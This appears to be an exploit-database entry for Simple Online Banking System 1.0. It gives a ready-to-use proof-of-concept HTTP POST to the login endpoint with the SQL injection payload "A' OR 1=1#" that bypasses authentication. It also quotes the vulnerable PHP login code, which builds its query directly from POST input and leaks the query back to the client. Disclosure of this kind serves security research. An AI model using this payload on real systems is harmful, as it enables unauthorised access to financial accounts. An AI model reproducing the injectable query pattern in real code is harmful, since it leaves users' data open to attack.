Headline
Simple Online Banking System 1.0 SQL Injection
Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123 Vuln code:/classes/Login.phpVuln parameter:username public function login(){ extract($_POST); $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); if($qry->num_rows > 0){ foreach($qry->fetch_array() as $k => $v){ if(!is_numeric($k) && $k != 'password'){ $this->settings->set_userdata($k,$v); } } $this->settings->set_userdata('login_type',1); return json_encode(array('status'=>'success')); }else{ return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') ")); } }